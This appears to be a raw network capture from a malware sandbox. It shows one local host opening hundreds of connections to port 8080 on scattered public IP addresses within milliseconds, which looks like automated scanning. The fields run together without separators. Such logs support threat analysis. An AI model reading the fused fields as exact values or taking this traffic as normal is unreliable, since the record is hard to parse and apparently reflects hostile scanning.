                                              Nov 23, 2023 05:14:49.026695013 CET478168080192.168.2.1485.250.26.246
                                              Nov 23, 2023 05:14:49.026706934 CET478168080192.168.2.1485.15.162.72
                                              Nov 23, 2023 05:14:49.026710033 CET478168080192.168.2.1431.138.248.149
                                              Nov 23, 2023 05:14:49.026710987 CET478168080192.168.2.1495.200.117.62
                                              Nov 23, 2023 05:14:49.026710987 CET478168080192.168.2.1485.79.220.66
                                              Nov 23, 2023 05:14:49.026710987 CET478168080192.168.2.1485.160.39.104
                                              Nov 23, 2023 05:14:49.026710987 CET478168080192.168.2.1462.251.102.254
                                              Nov 23, 2023 05:14:49.026712894 CET478168080192.168.2.1462.204.249.233
                                              Nov 23, 2023 05:14:49.026712894 CET478168080192.168.2.1462.135.245.181
                                              Nov 23, 2023 05:14:49.026753902 CET478168080192.168.2.1431.5.6.236
                                              Nov 23, 2023 05:14:49.026787043 CET478168080192.168.2.1485.85.95.4
                                              Nov 23, 2023 05:14:49.026797056 CET478168080192.168.2.1494.193.9.235
                                              Nov 23, 2023 05:14:49.026812077 CET478168080192.168.2.1485.240.253.20
                                              Nov 23, 2023 05:14:49.026813030 CET478168080192.168.2.1431.225.37.187
                                              Nov 23, 2023 05:14:49.026840925 CET478168080192.168.2.1462.6.104.97
                                              Nov 23, 2023 05:14:49.026845932 CET478168080192.168.2.1495.148.0.236
                                              Nov 23, 2023 05:14:49.026845932 CET478168080192.168.2.1485.95.199.186
                                              Nov 23, 2023 05:14:49.026851892 CET478168080192.168.2.1485.167.201.139
                                              Nov 23, 2023 05:14:49.026870966 CET478168080192.168.2.1485.90.30.60
                                              Nov 23, 2023 05:14:49.026870966 CET478168080192.168.2.1431.27.211.78
                                              Nov 23, 2023 05:14:49.026911020 CET478168080192.168.2.1494.213.98.249
                                              Nov 23, 2023 05:14:49.026943922 CET478168080192.168.2.1462.114.143.73
                                              Nov 23, 2023 05:14:49.026952982 CET478168080192.168.2.1485.10.46.181
                                              Nov 23, 2023 05:14:49.026957989 CET478168080192.168.2.1462.8.128.2
                                              Nov 23, 2023 05:14:49.026959896 CET478168080192.168.2.1495.139.138.131
                                              Nov 23, 2023 05:14:49.026959896 CET478168080192.168.2.1431.201.12.159
                                              Nov 23, 2023 05:14:49.026968956 CET478168080192.168.2.1431.66.141.247
                                              Nov 23, 2023 05:14:49.026971102 CET478168080192.168.2.1431.139.60.164
                                              Nov 23, 2023 05:14:49.026971102 CET478168080192.168.2.1495.114.32.168
                                              Nov 23, 2023 05:14:49.027019024 CET478168080192.168.2.1431.186.92.16
                                              Nov 23, 2023 05:14:49.027029037 CET478168080192.168.2.1485.47.109.10
                                              Nov 23, 2023 05:14:49.027035952 CET478168080192.168.2.1485.241.49.74
                                              Nov 23, 2023 05:14:49.027044058 CET478168080192.168.2.1485.115.82.43
                                              Nov 23, 2023 05:14:49.027044058 CET478168080192.168.2.1485.31.166.114
                                              Nov 23, 2023 05:14:49.027045012 CET478168080192.168.2.1495.184.59.148
                                              Nov 23, 2023 05:14:49.027060986 CET478168080192.168.2.1495.246.23.96
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1494.198.7.147
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1495.164.168.182
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1462.28.26.195
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1485.104.229.39
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1485.60.155.160
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1485.181.29.250
                                              Nov 23, 2023 05:14:49.027061939 CET478168080192.168.2.1495.20.237.123
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1495.66.6.109
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1485.227.234.17
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1494.140.172.175
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1494.8.83.62
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1462.128.21.234
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1485.225.255.215
                                              Nov 23, 2023 05:14:49.027066946 CET478168080192.168.2.1495.163.67.187
                                              Nov 23, 2023 05:14:49.027081966 CET478168080192.168.2.1494.97.39.51
                                              Nov 23, 2023 05:14:49.027098894 CET478168080192.168.2.1495.109.159.130
                                              Nov 23, 2023 05:14:49.027113914 CET478168080192.168.2.1485.36.154.105
                                              Nov 23, 2023 05:14:49.027126074 CET478168080192.168.2.1494.74.60.113
                                              Nov 23, 2023 05:14:49.027126074 CET478168080192.168.2.1485.220.113.98
                                              Nov 23, 2023 05:14:49.027163029 CET478168080192.168.2.1494.221.0.122
                                              Nov 23, 2023 05:14:49.027193069 CET478168080192.168.2.1431.164.200.103
                                              Nov 23, 2023 05:14:49.027194023 CET478168080192.168.2.1495.242.177.135
                                              Nov 23, 2023 05:14:49.027208090 CET478168080192.168.2.1485.31.38.150
                                              Nov 23, 2023 05:14:49.027209044 CET478168080192.168.2.1485.223.171.226
                                              Nov 23, 2023 05:14:49.027209044 CET478168080192.168.2.1431.48.130.241
                                              Nov 23, 2023 05:14:49.027209044 CET478168080192.168.2.1485.170.200.91
                                              Nov 23, 2023 05:14:49.027244091 CET478168080192.168.2.1485.136.162.255
                                              Nov 23, 2023 05:14:49.027244091 CET478168080192.168.2.1431.214.21.38
                                              Nov 23, 2023 05:14:49.027283907 CET478168080192.168.2.1431.18.85.152
                                              Nov 23, 2023 05:14:49.027283907 CET478168080192.168.2.1431.44.147.149
                                              Nov 23, 2023 05:14:49.027323961 CET478168080192.168.2.1431.205.60.80
                                              Nov 23, 2023 05:14:49.027324915 CET478168080192.168.2.1494.174.34.92
                                              Nov 23, 2023 05:14:49.027326107 CET478168080192.168.2.1485.112.157.70
                                              Nov 23, 2023 05:14:49.027324915 CET478168080192.168.2.1494.130.254.17
                                              Nov 23, 2023 05:14:49.027332067 CET478168080192.168.2.1494.37.233.224
                                              Nov 23, 2023 05:14:49.027342081 CET478168080192.168.2.1485.38.197.48
                                              Nov 23, 2023 05:14:49.027347088 CET478168080192.168.2.1462.166.15.238
                                              Nov 23, 2023 05:14:49.027347088 CET478168080192.168.2.1431.9.177.22
                                              Nov 23, 2023 05:14:49.027380943 CET478168080192.168.2.1485.190.85.87
                                              Nov 23, 2023 05:14:49.027380943 CET478168080192.168.2.1462.120.128.198
                                              Nov 23, 2023 05:14:49.027426004 CET478168080192.168.2.1462.47.127.188
                                              Nov 23, 2023 05:14:49.027442932 CET478168080192.168.2.1485.12.42.50
                                              Nov 23, 2023 05:14:49.027446985 CET478168080192.168.2.1462.182.32.201
                                              Nov 23, 2023 05:14:49.027458906 CET478168080192.168.2.1495.7.150.216
                                              Nov 23, 2023 05:14:49.027465105 CET478168080192.168.2.1431.225.55.48
                                              Nov 23, 2023 05:14:49.027465105 CET478168080192.168.2.1495.112.43.43
                                              Nov 23, 2023 05:14:49.027476072 CET478168080192.168.2.1495.81.190.61
                                              Nov 23, 2023 05:14:49.027477026 CET478168080192.168.2.1494.67.124.47
                                              Nov 23, 2023 05:14:49.027492046 CET478168080192.168.2.1485.33.4.33
                                              Nov 23, 2023 05:14:49.027492046 CET478168080192.168.2.1431.66.81.96
                                              Nov 23, 2023 05:14:49.027550936 CET478168080192.168.2.1462.37.216.109
                                              Nov 23, 2023 05:14:49.027551889 CET478168080192.168.2.1495.199.87.145
                                              Nov 23, 2023 05:14:49.027559042 CET478168080192.168.2.1462.163.12.149
                                              Nov 23, 2023 05:14:49.027559042 CET478168080192.168.2.1462.170.182.252
                                              Nov 23, 2023 05:14:49.027561903 CET478168080192.168.2.1485.117.229.30
                                              Nov 23, 2023 05:14:49.027564049 CET478168080192.168.2.1431.215.201.149
                                              Nov 23, 2023 05:14:49.027564049 CET478168080192.168.2.1462.97.127.161
                                              Nov 23, 2023 05:14:49.027564049 CET478168080192.168.2.1494.118.239.131
                                              Nov 23, 2023 05:14:49.027564049 CET478168080192.168.2.1495.185.11.120
                                              Nov 23, 2023 05:14:49.027564049 CET478168080192.168.2.1495.224.115.83
                                              Nov 23, 2023 05:14:49.027566910 CET478168080192.168.2.1462.246.129.71
                                              Nov 23, 2023 05:14:49.027566910 CET478168080192.168.2.1431.43.98.152
                                              Nov 23, 2023 05:14:49.027569056 CET478168080192.168.2.1494.150.98.234
                                              Nov 23, 2023 05:14:49.027569056 CET478168080192.168.2.1431.20.137.165
                                              Nov 23, 2023 05:14:49.027569056 CET478168080192.168.2.1494.118.112.236
                                              Nov 23, 2023 05:14:49.027570009 CET478168080192.168.2.1431.22.232.220
                                              Nov 23, 2023 05:14:49.027570009 CET478168080192.168.2.1485.70.127.49
                                              Nov 23, 2023 05:14:49.027585030 CET478168080192.168.2.1431.221.102.189
                                              Nov 23, 2023 05:14:49.027609110 CET478168080192.168.2.1431.228.147.71
                                              Nov 23, 2023 05:14:49.027609110 CET478168080192.168.2.1485.60.102.218
                                              Nov 23, 2023 05:14:49.027631998 CET478168080192.168.2.1462.181.195.223
                                              Nov 23, 2023 05:14:49.027638912 CET478168080192.168.2.1494.82.209.63
                                              Nov 23, 2023 05:14:49.027663946 CET478168080192.168.2.1494.235.27.75
                                              Nov 23, 2023 05:14:49.027673960 CET478168080192.168.2.1462.132.12.232
                                              Nov 23, 2023 05:14:49.027678967 CET478168080192.168.2.1485.168.1.193
                                              Nov 23, 2023 05:14:49.027709007 CET478168080192.168.2.1485.159.147.59
                                              Nov 23, 2023 05:14:49.027709007 CET478168080192.168.2.1495.148.141.140
                                              Nov 23, 2023 05:14:49.027770996 CET478168080192.168.2.1431.181.15.40
                                              Nov 23, 2023 05:14:49.027771950 CET478168080192.168.2.1495.24.228.98
                                              Nov 23, 2023 05:14:49.027786970 CET478168080192.168.2.1485.190.155.107
                                              Nov 23, 2023 05:14:49.027786970 CET478168080192.168.2.1431.21.182.12
                                              Nov 23, 2023 05:14:49.027786970 CET478168080192.168.2.1462.196.148.1
                                              Nov 23, 2023 05:14:49.027813911 CET478168080192.168.2.1462.190.83.183
                                              Nov 23, 2023 05:14:49.027818918 CET478168080192.168.2.1495.105.41.225
                                              Nov 23, 2023 05:14:49.027818918 CET478168080192.168.2.1485.154.38.188
                                              Nov 23, 2023 05:14:49.027827024 CET478168080192.168.2.1485.206.247.129
                                              Nov 23, 2023 05:14:49.027832031 CET478168080192.168.2.1494.99.33.173
                                              Nov 23, 2023 05:14:49.027842999 CET478168080192.168.2.1431.153.234.199
                                              Nov 23, 2023 05:14:49.027842999 CET478168080192.168.2.1431.87.77.31
                                              Nov 23, 2023 05:14:49.027887106 CET478168080192.168.2.1494.246.118.129
                                              Nov 23, 2023 05:14:49.027920008 CET478168080192.168.2.1431.61.158.106
                                              Nov 23, 2023 05:14:49.027930975 CET478168080192.168.2.1494.27.234.170
                                              Nov 23, 2023 05:14:49.027930975 CET478168080192.168.2.1462.209.104.69
                                              Nov 23, 2023 05:14:49.027966022 CET478168080192.168.2.1485.159.214.121
                                              Nov 23, 2023 05:14:49.027966976 CET478168080192.168.2.1494.52.244.218
                                              Nov 23, 2023 05:14:49.027966976 CET478168080192.168.2.1485.84.176.111
                                              Nov 23, 2023 05:14:49.027992010 CET478168080192.168.2.1462.131.102.150
                                              Nov 23, 2023 05:14:49.027992010 CET478168080192.168.2.1462.80.12.111
                                              Nov 23, 2023 05:14:49.028006077 CET478168080192.168.2.1494.144.59.158
                                              Nov 23, 2023 05:14:49.028006077 CET478168080192.168.2.1431.12.87.38
                                              Nov 23, 2023 05:14:49.028006077 CET478168080192.168.2.1431.76.103.71
                                              Nov 23, 2023 05:14:49.028008938 CET478168080192.168.2.1462.96.10.249
                                              Nov 23, 2023 05:14:49.028008938 CET478168080192.168.2.1495.97.9.91
                                              Nov 23, 2023 05:14:49.028024912 CET478168080192.168.2.1462.110.251.236
                                              Nov 23, 2023 05:14:49.028024912 CET478168080192.168.2.1485.255.150.175
                                              Nov 23, 2023 05:14:49.028042078 CET478168080192.168.2.1495.155.200.73
                                              Nov 23, 2023 05:14:49.028042078 CET478168080192.168.2.1431.237.58.199
                                              Nov 23, 2023 05:14:49.028064013 CET478168080192.168.2.1462.185.223.118
                                              Nov 23, 2023 05:14:49.028064966 CET478168080192.168.2.1462.89.13.191
                                              Nov 23, 2023 05:14:49.028064966 CET478168080192.168.2.1485.139.103.140
                                              Nov 23, 2023 05:14:49.028083086 CET478168080192.168.2.1495.64.16.213
                                              Nov 23, 2023 05:14:49.028098106 CET478168080192.168.2.1462.187.103.154
                                              Nov 23, 2023 05:14:49.028103113 CET478168080192.168.2.1494.193.47.132
                                              Nov 23, 2023 05:14:49.028104067 CET478168080192.168.2.1494.29.46.21
                                              Nov 23, 2023 05:14:49.028104067 CET478168080192.168.2.1495.48.249.187
                                              Nov 23, 2023 05:14:49.028104067 CET478168080192.168.2.1494.174.193.92
                                              Nov 23, 2023 05:14:49.028116941 CET478168080192.168.2.1495.130.67.50
                                              Nov 23, 2023 05:14:49.028121948 CET478168080192.168.2.1431.65.80.53
                                              Nov 23, 2023 05:14:49.028121948 CET478168080192.168.2.1485.111.187.38
                                              Nov 23, 2023 05:14:49.028143883 CET478168080192.168.2.1494.3.154.156
                                              Nov 23, 2023 05:14:49.028160095 CET478168080192.168.2.1431.232.193.208
                                              Nov 23, 2023 05:14:49.028161049 CET478168080192.168.2.1431.193.83.52
                                              Nov 23, 2023 05:14:49.028179884 CET478168080192.168.2.1485.140.183.189
                                              Nov 23, 2023 05:14:49.028191090 CET478168080192.168.2.1495.33.71.53
                                              Nov 23, 2023 05:14:49.028239965 CET478168080192.168.2.1462.219.23.122
                                              Nov 23, 2023 05:14:49.028240919 CET478168080192.168.2.1462.78.10.159
                                              Nov 23, 2023 05:14:49.028240919 CET478168080192.168.2.1494.13.148.78
                                              Nov 23, 2023 05:14:49.028247118 CET478168080192.168.2.1485.95.50.162
                                              Nov 23, 2023 05:14:49.028254032 CET478168080192.168.2.1494.106.225.204
                                              Nov 23, 2023 05:14:49.028254032 CET478168080192.168.2.1494.72.49.65
                                              Nov 23, 2023 05:14:49.028255939 CET478168080192.168.2.1495.94.83.123
                                              Nov 23, 2023 05:14:49.028255939 CET478168080192.168.2.1495.216.47.113
                                              Nov 23, 2023 05:14:49.028260946 CET478168080192.168.2.1462.202.222.216
                                              Nov 23, 2023 05:14:49.028260946 CET478168080192.168.2.1485.177.229.248
                                              Nov 23, 2023 05:14:49.028260946 CET478168080192.168.2.1431.34.234.101
                                              Nov 23, 2023 05:14:49.028264999 CET478168080192.168.2.1495.124.102.45
                                              Nov 23, 2023 05:14:49.028265953 CET478168080192.168.2.1462.22.240.94
                                              Nov 23, 2023 05:14:49.028265953 CET478168080192.168.2.1431.170.188.184
                                              Nov 23, 2023 05:14:49.028266907 CET478168080192.168.2.1462.25.150.19
                                              Nov 23, 2023 05:14:49.028266907 CET478168080192.168.2.1494.65.56.174
                                              Nov 23, 2023 05:14:49.028279066 CET478168080192.168.2.1462.147.117.239
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1485.188.15.247
                                              Nov 23, 2023 05:14:49.028280973 CET478168080192.168.2.1485.29.177.20
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1495.210.108.83
                                              Nov 23, 2023 05:14:49.028280973 CET478168080192.168.2.1495.242.76.187
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1462.98.137.84
                                              Nov 23, 2023 05:14:49.028280973 CET478168080192.168.2.1495.177.126.200
                                              Nov 23, 2023 05:14:49.028280973 CET478168080192.168.2.1494.216.0.87
                                              Nov 23, 2023 05:14:49.028280973 CET478168080192.168.2.1431.117.160.188
                                              Nov 23, 2023 05:14:49.028284073 CET478168080192.168.2.1485.187.100.114
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1494.240.114.86
                                              Nov 23, 2023 05:14:49.028284073 CET478168080192.168.2.1431.232.214.70
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1462.173.112.56
                                              Nov 23, 2023 05:14:49.028284073 CET478168080192.168.2.1495.34.40.192
                                              Nov 23, 2023 05:14:49.028281927 CET478168080192.168.2.1431.154.35.94
                                              Nov 23, 2023 05:14:49.028290987 CET478168080192.168.2.1495.54.82.224
                                              Nov 23, 2023 05:14:49.028314114 CET478168080192.168.2.1462.147.206.179
                                              Nov 23, 2023 05:14:49.028316975 CET478168080192.168.2.1431.206.93.224
                                              Nov 23, 2023 05:14:49.028317928 CET478168080192.168.2.1462.255.239.204
                                              Nov 23, 2023 05:14:49.028322935 CET478168080192.168.2.1494.143.142.79
                                              Nov 23, 2023 05:14:49.028322935 CET478168080192.168.2.1485.192.21.165
                                              Nov 23, 2023 05:14:49.028362989 CET478168080192.168.2.1485.63.153.239
                                              Nov 23, 2023 05:14:49.028369904 CET478168080192.168.2.1462.19.254.8
                                              Nov 23, 2023 05:14:49.028369904 CET478168080192.168.2.1495.198.186.84
                                              Nov 23, 2023 05:14:49.028393984 CET478168080192.168.2.1462.23.173.180
                                              Nov 23, 2023 05:14:49.028393984 CET478168080192.168.2.1485.100.119.195
                                              Nov 23, 2023 05:14:49.028424978 CET478168080192.168.2.1494.203.18.163
                                              Nov 23, 2023 05:14:49.028428078 CET478168080192.168.2.1431.183.159.28
                                              Nov 23, 2023 05:14:49.028430939 CET478168080192.168.2.1494.215.30.41
                                              Nov 23, 2023 05:14:49.028430939 CET478168080192.168.2.1485.172.175.247
                                              Nov 23, 2023 05:14:49.028438091 CET478168080192.168.2.1431.40.148.231
                                              Nov 23, 2023 05:14:49.028438091 CET478168080192.168.2.1495.147.96.24
                                              Nov 23, 2023 05:14:49.028439999 CET478168080192.168.2.1462.174.207.90
                                              Nov 23, 2023 05:14:49.028439999 CET478168080192.168.2.1494.253.56.195
                                              Nov 23, 2023 05:14:49.028462887 CET478168080192.168.2.1431.218.59.22
                                              Nov 23, 2023 05:14:49.028462887 CET478168080192.168.2.1462.147.148.28
                                              Nov 23, 2023 05:14:49.028465033 CET478168080192.168.2.1495.29.146.203
                                              Nov 23, 2023 05:14:49.028481960 CET478168080192.168.2.1494.118.194.41
                                              Nov 23, 2023 05:14:49.028481960 CET478168080192.168.2.1431.175.216.66
                                              Nov 23, 2023 05:14:49.028498888 CET478168080192.168.2.1494.118.129.27
                                              Nov 23, 2023 05:14:49.028498888 CET478168080192.168.2.1485.165.239.237
                                              Nov 23, 2023 05:14:49.028515100 CET478168080192.168.2.1462.48.124.154
                                              Nov 23, 2023 05:14:49.028527021 CET478168080192.168.2.1485.19.228.55
                                              Nov 23, 2023 05:14:49.028527021 CET478168080192.168.2.1495.1.189.200
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1485.102.236.66
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1485.177.20.53
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1494.17.123.240
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1431.30.227.240
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1431.134.111.125
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1494.85.232.132
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1462.92.26.171
                                              Nov 23, 2023 05:14:49.028544903 CET478168080192.168.2.1494.219.164.34
                                              Nov 23, 2023 05:14:49.028551102 CET478168080192.168.2.1431.23.85.37
                                              Nov 23, 2023 05:14:49.028553963 CET478168080192.168.2.1462.4.209.225
                                              Nov 23, 2023 05:14:49.028573990 CET478168080192.168.2.1495.15.201.20
                                              Nov 23, 2023 05:14:49.028594971 CET478168080192.168.2.1462.180.151.124
                                              Nov 23, 2023 05:14:49.028598070 CET478168080192.168.2.1485.245.143.198
                                              Nov 23, 2023 05:14:49.028598070 CET478168080192.168.2.1485.254.174.87
                                              Nov 23, 2023 05:14:49.028610945 CET478168080192.168.2.1494.195.217.69
                                              Nov 23, 2023 05:14:49.028610945 CET478168080192.168.2.1494.138.36.33
                                              Nov 23, 2023 05:14:49.028610945 CET478168080192.168.2.1494.100.120.156
                                              Nov 23, 2023 05:14:49.028610945 CET478168080192.168.2.1495.134.131.0
                                              Nov 23, 2023 05:14:49.028610945 CET478168080192.168.2.1485.43.160.82
                                              Nov 23, 2023 05:14:49.028623104 CET478168080192.168.2.1495.199.137.179
                                              Nov 23, 2023 05:14:49.028630018 CET478168080192.168.2.1462.175.93.19
                                              Nov 23, 2023 05:14:49.028630018 CET478168080192.168.2.1485.102.49.114
                                              Nov 23, 2023 05:14:49.028630018 CET478168080192.168.2.1462.127.238.135
                                              Nov 23, 2023 05:14:49.028649092 CET478168080192.168.2.1485.24.254.76
                                              Nov 23, 2023 05:14:49.028650045 CET478168080192.168.2.1485.141.131.159
                                              Nov 23, 2023 05:14:49.028650045 CET478168080192.168.2.1494.69.144.100
                                              Nov 23, 2023 05:14:49.028669119 CET478168080192.168.2.1494.58.69.2
                                              Nov 23, 2023 05:14:49.028678894 CET478168080192.168.2.1462.43.111.105
                                              Nov 23, 2023 05:14:49.028678894 CET478168080192.168.2.1485.145.64.137
                                              Nov 23, 2023 05:14:49.028680086 CET478168080192.168.2.1485.154.14.185
                                              Nov 23, 2023 05:14:49.028681993 CET478168080192.168.2.1431.162.240.46
                                              Nov 23, 2023 05:14:49.028681993 CET478168080192.168.2.1431.66.40.145
                                              Nov 23, 2023 05:14:49.028687000 CET478168080192.168.2.1431.200.180.190
                                              Nov 23, 2023 05:14:49.028687000 CET478168080192.168.2.1462.1.110.156
                                              Nov 23, 2023 05:14:49.028692961 CET478168080192.168.2.1462.252.164.92
                                              Nov 23, 2023 05:14:49.028706074 CET478168080192.168.2.1485.94.202.121
                                              Nov 23, 2023 05:14:49.028708935 CET478168080192.168.2.1431.240.249.73
                                              Nov 23, 2023 05:14:49.028714895 CET478168080192.168.2.1495.242.227.238
                                              Nov 23, 2023 05:14:49.028714895 CET478168080192.168.2.1495.45.246.163
                                              Nov 23, 2023 05:14:49.028722048 CET478168080192.168.2.1485.247.228.155
                                              Nov 23, 2023 05:14:49.028727055 CET478168080192.168.2.1494.98.51.139
                                              Nov 23, 2023 05:14:49.028727055 CET478168080192.168.2.1462.147.187.133
                                              Nov 23, 2023 05:14:49.028727055 CET478168080192.168.2.1462.208.34.19
                                              Nov 23, 2023 05:14:49.028727055 CET478168080192.168.2.1485.117.20.211
                                              Nov 23, 2023 05:14:49.028727055 CET478168080192.168.2.1495.185.86.194
                                              Nov 23, 2023 05:14:49.028733969 CET478168080192.168.2.1495.214.180.163
                                              Nov 23, 2023 05:14:49.028748035 CET478168080192.168.2.1462.6.172.196
                                              Nov 23, 2023 05:14:49.028748035 CET478168080192.168.2.1431.248.155.158
                                              Nov 23, 2023 05:14:49.028760910 CET478168080192.168.2.1495.45.58.33
                                              Nov 23, 2023 05:14:49.028765917 CET478168080192.168.2.1485.60.228.161
                                              Nov 23, 2023 05:14:49.028765917 CET478168080192.168.2.1495.191.215.172
                                              Nov 23, 2023 05:14:49.028779030 CET478168080192.168.2.1495.10.240.227
                                              Nov 23, 2023 05:14:49.028779030 CET478168080192.168.2.1485.105.238.155
                                              Nov 23, 2023 05:14:49.028783083 CET478168080192.168.2.1495.131.166.34
                                              Nov 23, 2023 05:14:49.028790951 CET478168080192.168.2.1494.226.4.105
                                              Nov 23, 2023 05:14:49.028810978 CET478168080192.168.2.1494.107.144.156
                                              Nov 23, 2023 05:14:49.028824091 CET478168080192.168.2.1495.245.188.239
                                              Nov 23, 2023 05:14:49.028841972 CET478168080192.168.2.1431.59.227.96
                                              Nov 23, 2023 05:14:49.028846025 CET478168080192.168.2.1495.8.120.163
                                              Nov 23, 2023 05:14:49.028846025 CET478168080192.168.2.1494.11.232.47
                                              Nov 23, 2023 05:14:49.028846979 CET478168080192.168.2.1462.224.35.100
                                              Nov 23, 2023 05:14:49.028846979 CET478168080192.168.2.1494.56.222.85
                                              Nov 23, 2023 05:14:49.028865099 CET478168080192.168.2.1494.163.221.206
                                              Nov 23, 2023 05:14:49.028871059 CET478168080192.168.2.1431.136.28.87
                                              Nov 23, 2023 05:14:49.028871059 CET478168080192.168.2.1495.190.182.239
                                              Nov 23, 2023 05:14:49.028871059 CET478168080192.168.2.1485.134.71.118
                                              Nov 23, 2023 05:14:49.028871059 CET478168080192.168.2.1495.179.220.255
                                              Nov 23, 2023 05:14:49.028889894 CET478168080192.168.2.1495.209.71.10
                                              Nov 23, 2023 05:14:49.028897047 CET478168080192.168.2.1431.174.238.108
                                              Nov 23, 2023 05:14:49.028909922 CET478168080192.168.2.1494.66.81.139
                                              Nov 23, 2023 05:14:49.028917074 CET478168080192.168.2.1495.253.33.30
                                              Nov 23, 2023 05:14:49.028917074 CET478168080192.168.2.1495.15.152.198
                                              Nov 23, 2023 05:14:49.028919935 CET478168080192.168.2.1462.248.176.8
                                              Nov 23, 2023 05:14:49.028929949 CET478168080192.168.2.1462.9.92.246
                                              Nov 23, 2023 05:14:49.028929949 CET478168080192.168.2.1431.130.97.199
                                              Nov 23, 2023 05:14:49.028942108 CET478168080192.168.2.1495.101.233.48
                                              Nov 23, 2023 05:14:49.028953075 CET478168080192.168.2.1431.115.13.36
                                              Nov 23, 2023 05:14:49.028973103 CET478168080192.168.2.1431.36.86.122
                                              Nov 23, 2023 05:14:49.028973103 CET478168080192.168.2.1462.59.94.18
                                              Nov 23, 2023 05:14:49.028973103 CET478168080192.168.2.1485.135.91.245
                                              Nov 23, 2023 05:14:49.028973103 CET478168080192.168.2.1431.137.163.66
                                              Nov 23, 2023 05:14:49.028994083 CET478168080192.168.2.1494.66.176.70
                                              Nov 23, 2023 05:14:49.029006958 CET478168080192.168.2.1495.68.140.184
                                              Nov 23, 2023 05:14:49.029012918 CET478168080192.168.2.1431.189.159.93
                                              Nov 23, 2023 05:14:49.029027939 CET478168080192.168.2.1494.89.87.218
                                              Nov 23, 2023 05:14:49.029059887 CET478168080192.168.2.1485.4.175.39
                                              Nov 23, 2023 05:14:49.029059887 CET478168080192.168.2.1495.65.233.7
                                              Nov 23, 2023 05:14:49.029074907 CET478168080192.168.2.1431.6.135.45
                                              Nov 23, 2023 05:14:49.029076099 CET478168080192.168.2.1485.122.167.242
                                              Nov 23, 2023 05:14:49.029074907 CET478168080192.168.2.1495.167.119.202
                                              Nov 23, 2023 05:14:49.029092073 CET478168080192.168.2.1494.92.138.113
                                              Nov 23, 2023 05:14:49.029092073 CET478168080192.168.2.1431.228.51.167
                                              Nov 23, 2023 05:14:49.029093027 CET478168080192.168.2.1431.35.61.193
                                              Nov 23, 2023 05:14:49.029092073 CET478168080192.168.2.1495.255.150.171
                                              Nov 23, 2023 05:14:49.029093027 CET478168080192.168.2.1485.229.213.33
                                              Nov 23, 2023 05:14:49.029093027 CET478168080192.168.2.1462.144.141.62
                                              Nov 23, 2023 05:14:49.029093981 CET478168080192.168.2.1485.103.194.158
                                              Nov 23, 2023 05:14:49.029094934 CET478168080192.168.2.1462.104.145.37
                                              Nov 23, 2023 05:14:49.029093027 CET478168080192.168.2.1462.69.126.252
                                              Nov 23, 2023 05:14:49.029094934 CET478168080192.168.2.1495.205.173.226
                                              Nov 23, 2023 05:14:49.029094934 CET478168080192.168.2.1462.70.66.38
                                              Nov 23, 2023 05:14:49.029110909 CET478168080192.168.2.1431.90.50.24
                                              Nov 23, 2023 05:14:49.029122114 CET478168080192.168.2.1495.104.199.220
                                              Nov 23, 2023 05:14:49.029138088 CET478168080192.168.2.1494.20.50.42
                                              Nov 23, 2023 05:14:49.029160023 CET478168080192.168.2.1431.109.159.194
                                              Nov 23, 2023 05:14:49.029191017 CET478168080192.168.2.1495.25.235.83
                                              Nov 23, 2023 05:14:49.029191017 CET478168080192.168.2.1485.181.133.173
                                              Nov 23, 2023 05:14:49.029191971 CET478168080192.168.2.1494.144.76.37
                                              Nov 23, 2023 05:14:49.029191017 CET478168080192.168.2.1494.41.25.78
                                              Nov 23, 2023 05:14:49.029192924 CET478168080192.168.2.1495.177.11.227
                                              Nov 23, 2023 05:14:49.029195070 CET478168080192.168.2.1494.1.56.27
                                              Nov 23, 2023 05:14:49.029195070 CET478168080192.168.2.1462.23.253.220
                                              Nov 23, 2023 05:14:49.029195070 CET478168080192.168.2.1431.191.202.222
                                              Nov 23, 2023 05:14:49.029198885 CET478168080192.168.2.1485.172.124.191
                                              Nov 23, 2023 05:14:49.029211998 CET478168080192.168.2.1485.55.92.158
                                              Nov 23, 2023 05:14:49.029223919 CET478168080192.168.2.1485.52.228.142
                                              Nov 23, 2023 05:14:49.029228926 CET478168080192.168.2.1495.124.123.194
                                              Nov 23, 2023 05:14:49.029253006 CET478168080192.168.2.1485.123.32.82
                                              Nov 23, 2023 05:14:49.029254913 CET478168080192.168.2.1494.180.153.54
                                              Nov 23, 2023 05:14:49.029263973 CET478168080192.168.2.1485.136.80.243
                                              Nov 23, 2023 05:14:49.029264927 CET478168080192.168.2.1494.126.69.62
                                              Nov 23, 2023 05:14:49.029263973 CET478168080192.168.2.1462.83.194.118
                                              Nov 23, 2023 05:14:49.029275894 CET478168080192.168.2.1494.237.132.182
                                              Nov 23, 2023 05:14:49.029284954 CET478168080192.168.2.1462.90.204.178
                                              Nov 23, 2023 05:14:49.029299974 CET478168080192.168.2.1494.157.70.183
                                              Nov 23, 2023 05:14:49.029299974 CET478168080192.168.2.1462.168.242.166
                                              Nov 23, 2023 05:14:49.029300928 CET478168080192.168.2.1462.137.125.168
                                              Nov 23, 2023 05:14:49.029330015 CET478168080192.168.2.1431.171.175.139
